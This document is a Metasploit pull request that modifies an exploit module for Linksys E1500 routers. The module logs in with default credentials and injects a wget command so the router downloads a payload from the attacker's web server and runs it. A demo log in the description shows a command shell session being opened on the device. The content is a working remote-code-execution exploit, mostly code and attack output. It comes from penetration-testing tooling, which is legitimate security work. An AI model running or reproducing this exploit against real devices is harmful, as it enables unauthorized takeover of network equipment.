### PR TITLE
Linksys e1500 exploit

### DIFF
--- a/modules/exploits/linux/http/linksys_e1500_up_exec.rb
+++ b/modules/exploits/linux/http/linksys_e1500_up_exec.rb
@@ -161,6 +161,11 @@ class Metasploit3 < Msf::Exploit::Remote
 				datastore['SSL'] = false
 			end
 
+			#we use SRVHOST as download IP for the coming wget command. 
+			#SRVHOST needs a real IP address of our download host
+			if datastore['SRVHOST'] =~ /0\.0\.0\.0/
+				fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Configure SRVHOST to your local IP address.")
+			end
 			service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
 			print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
 			start_service({'Uri' => {
@@ -179,6 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
 		#this filename is used to store the payload on the device
 		filename = rand_text_alpha_lower(8)
+
 		#not working if we send all command together -> lets take three requests
 		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
 		res = request(cmd,user,pass,uri)

--- a/modules/exploits/linux/http/linksys_e1500_up_exec.rb
+++ b/modules/exploits/linux/http/linksys_e1500_up_exec.rb
@@ -163,10 +163,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
 			#we use SRVHOST as download IP for the coming wget command. 
 			#SRVHOST needs a real IP address of our download host
-			if datastore['SRVHOST'] =~ /0\.0\.0\.0/
-				fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Configure SRVHOST to your local IP address.")
+			if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+				srv_host = Rex::Socket.source_address(rhost)
+			else
+				srv_host = datastore['SRVHOST']
 			end
-			service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+
+			service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
 			print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
 			start_service({'Uri' => {
 				'Proc' => Proc.new { |cli, req|


### PR DESCRIPTION
Hey guys,

 this is a replacement of the auxiliary module modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb

Thx to Juans awesome work on the mips Payloads it was possible to generate a nice exploit module out of it.

Exploiting Demo - 192.168.178.105 / 0 exploit(linksys_e1500_up_exec) > exploit
[*] Exploit running as background job.

[_] Started bind handler
[_] 192.168.178.199:80 - Trying to login with admin / admin
Exploiting Demo - 192.168.178.105 / 0 exploit(linksys_e1500_up_exec) > [+] 192.168.178.199:80 - Successful login admin/admin
[_] 192.168.178.199:80 - Starting up our web service on http://192.168.178.105:8080/kCYwhenV ...
[_] Using URL: http://192.168.178.105:8080/kCYwhenV
[_] 192.168.178.199:80 - Asking the Linksys device to download http://192.168.178.105:8080/kCYwhenV
[_] 192.168.178.199:80 - Sending the payload to the server...
[_] 192.168.178.199:80 - Asking the Linksys device to prepare kCYwhenV
[_] 192.168.178.199:80 - Asking the Linksys device to execute kCYwhenV
[_] Command shell session 2 opened (192.168.178.105:55105 -> 192.168.178.199:4444) at 2013-03-30 11:48:29 +0100
[+] Deleted /tmp/cntyyvfr
[_] Server stopped.

Happy Easter,
MIke
